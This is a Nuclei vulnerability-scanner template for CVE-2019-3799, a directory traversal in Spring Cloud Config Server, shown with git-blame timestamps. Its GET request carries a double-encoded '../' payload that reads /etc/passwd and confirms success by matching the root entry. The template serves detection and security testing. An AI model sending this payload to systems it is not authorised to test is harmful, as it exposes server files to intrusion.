nuclei-templates/cves/CVE-2019-3799.yaml

19 lines
392 B
YAML
Raw Normal View History

2020-06-22 13:35:37 +00:00
id: CVE-2019-3799
info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
matchers:
- type: status
status:
2020-06-22 21:52:51 +00:00
- 200
2020-06-22 13:35:37 +00:00
- type: regex
regex:
2020-06-22 21:52:51 +00:00
- 'root:[x*]:0:0:'
2020-06-22 13:35:37 +00:00
part: body